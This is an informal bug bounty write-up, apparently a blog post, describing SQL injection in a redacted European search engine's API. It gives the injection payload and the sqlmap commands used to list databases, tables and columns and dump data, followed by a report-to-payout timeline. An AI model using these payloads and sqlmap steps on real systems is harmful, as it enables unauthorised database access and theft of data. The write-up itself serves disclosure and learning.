in a few days ago, i try to join with a bug bounty program and i try to search the program still running and managed.
i found **** program
FYI the target is european search engine. Like google or something. i guess the target is on france
The scope is : *.xxxx.com
Ok we go to the point
i found the vulnerability is on api.xxx.com
This is the raw that i got on burp
GET /api/trend/get?locale=en_GB&device=desktop&uiv=4 HTTP/1.1
Host: api.xxxx.com
Content-Type: application/x-www-form-urlencoded
Origin: https://www.xxx.com
Connection: close
blablabla
This is my payload : locale=en_GB’) AND 1234=(SELECT (CASE WHEN (1234=1234) THEN 1234 ELSE (SELECT 4376 UNION SELECT 4107) END)) — BWMI&device=desktop&uiv=4
- i save the raw into the notepad as .txt format
- i run my sqlmap from my terminal (because i used mac. i use this only sqlmap -r /xxx/xxx/xxx/files.txt — dbs
- i got something cool stuff there i got the database
- and i try to get more than the dbs. i try to check the table first using this sqlmap -r /xxx/xxx/xxx/files.txt -D xxx — table
- i found a lot of table there but there is something interesting for me. Then i try to get the columns
- sqlmap -r /xxx/xxx/xxx/files.txt -D xxx -T xxx — columns
- i got the columns. very interesting then i try to got the field of DB
- TADAAAA i GOT what i want .
- Create a report, and submit the report
- - status on review, then status changed to accepted, then solved now
- 2 July 2019 — report
- 2 July 2019 — accepted
- 9 July 2019 — ask for verification or retest
- 9 July 2019 — solved
- 2019–07–12 13:53:51 5000EURO BOUNTY HAS COMING
